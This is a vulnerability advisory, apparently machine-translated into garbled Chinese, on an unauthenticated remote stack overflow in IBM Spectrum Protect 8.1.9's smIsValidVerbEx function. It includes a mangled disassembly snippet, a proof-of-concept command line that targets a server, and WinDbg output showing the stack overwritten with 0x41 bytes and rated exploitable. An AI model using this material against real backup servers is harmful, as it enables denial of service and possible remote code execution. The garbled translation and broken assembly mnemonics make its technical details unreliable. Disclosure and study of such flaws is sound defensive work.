IBM频谱保护 Verb134非认证远程栈溢出

可租方发现IBM频谱保护8.1.9中非认证远程栈缓冲溢出漏洞smIsvalidVerbEx函数

下片段用注解显示脆弱度:

.text.00800996D33 movdx,sp+0B8h+filespace攻击者控制数据.text:00000180996D38liarcx固定尺寸buf栈.text.00800996D3D movr8Rax攻击者控制副本大小->栈溢出.text.00800996D40调用mcpy_0

概念证明

附加式为终止dsmsvc.exePoC可用如下方式:

python ibm_spectrum_protect_verb_134_stack_overflow_CVE-2020-4415.py -t
              
               P1500
              

smsvc.exe崩溃显示Windbg和Windbg可开发扩展显示易开发性

0:407>g(1f0.2010):安全检查故障或栈缓冲溢出-代码c000409second chance !!!) rax=0000000000000001 rbx=0000000000000000 rcx=0000000000000002 rdx=0000000000000003 rsi=0000028096541400 rdi=00000280978e3b70 rip=00007ffb1bd269dc rsp=000000b6ec4fe6c0 rbp=0000000000000000  r8=00000280bbc8ae20  r9=0000000000000022 r10=0000000000000022 r11=000000000000021e r12=0000000000000100 r13=00000280978e3b7f r14=0000000000000001 r15=4141414141414141 iopl=0         nv up ei pl nz na pe nc cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202 adsmdll!_report_gsfailure+0x1c: 00007ffb`1bd269dc cd29            int     29h 0:407> k 10  # Child-SP          RetAddr           Call Site 00 000000b6`ec4fe6c0 00007ffb`1b9d4d48 adsmdll!_report_gsfailure+0x1c 01 000000b6`ec4fe700 41414141`41414141 adsmdll!SmIsValidVerbEx+0x164a8 02 000000b6`ec4fe7c0 41414141`41414141 0x41414141`41414141 03 000000b6`ec4fe7c8 41414141`41414141 0x41414141`41414141 04 000000b6`ec4fe7d0 41414141`41414141 0x41414141`41414141 05 000000b6`ec4fe7d8 41414141`41414141 0x41414141`41414141 06 000000b6`ec4fe7e0 41414141`41414141 0x41414141`41414141 07 000000b6`ec4fe7e8 41414141`41414141 0x41414141`41414141 08 000000b6`ec4fe7f0 41414141`41414141 0x41414141`41414141 09 000000b6`ec4fe7f8 41414141`41414141 0x41414141`41414141 0a 000000b6`ec4fe800 41414141`41414141 0x41414141`41414141 0b 000000b6`ec4fe808 41414141`41414141 0x41414141`41414141 0c 000000b6`ec4fe810 41414141`41414141 0x41414141`41414141 0d 000000b6`ec4fe818 41414141`41414141 0x41414141`41414141 0e 000000b6`ec4fe820 41414141`41414141 0x41414141`41414141 0f 000000b6`ec4fe828 41414141`41414141 0x41414141`41414141 0:407> .load msec.dll 0:407> !exploitable  !exploitable 1.6.0.0 Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - Stack Buffer Overrun (/GS Exception) starting at adsmdll!_report_gsfailure+0x000000000000001c (Hash=0xbdd8d674.0x7e87e5be)  An overrun of a protected stack buffer has been detected.视之为可开发性,必须固定0:407> lm vm adsmdll Browse full module list start             end                 module name 00007ffb`1b030000 00007ffb`1e61b000   adsmdll    (pdb symbols)          C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\sym\adsmdll.pdb\AA09604A60F044BA8E25393F5CD6681E3\adsmdll.pdb     Loaded symbol image file: C:\PROGRA~1\Tivoli\TSM\Server\adsmdll.dll     Image path: C:\PROGRA~1\Tivoli\TSM\Server\adsmdll.dll     Image name: adsmdll.dll     Browse all global symbols  functions  data     Timestamp:        Fri Dec 20 13:00:35 2019 (5DFD0C43)     CheckSum:         034ABF92     ImageSize:        035EB000     File version:     8.1.9.19354     Product version:  8.1.9.19354     File flags:       0 (Mask 3F)     File OS:          40000 NT Base     File type:        2.0 Dll     File date:        00000000.00000000     Translations:     0409.04b0     Information from resource tables:         CompanyName:      IBM Corporation         ProductName:      IBM Spectrum Protect         InternalName:     ADSMDLL.DLL         OriginalFilename: ADSMDLL.DLL         ProductVersion:   88         FileVersion:      88         PrivateBuild:     88         SpecialBuild:     88         FileDescription:  IBM Spectrum Protect Server Main DLL         LegalCopyright:   Copyright © 1996, 2019 IBM         LegalTrademarks:  Copyright © 1996, 2019 IBM         Comments:         Version:88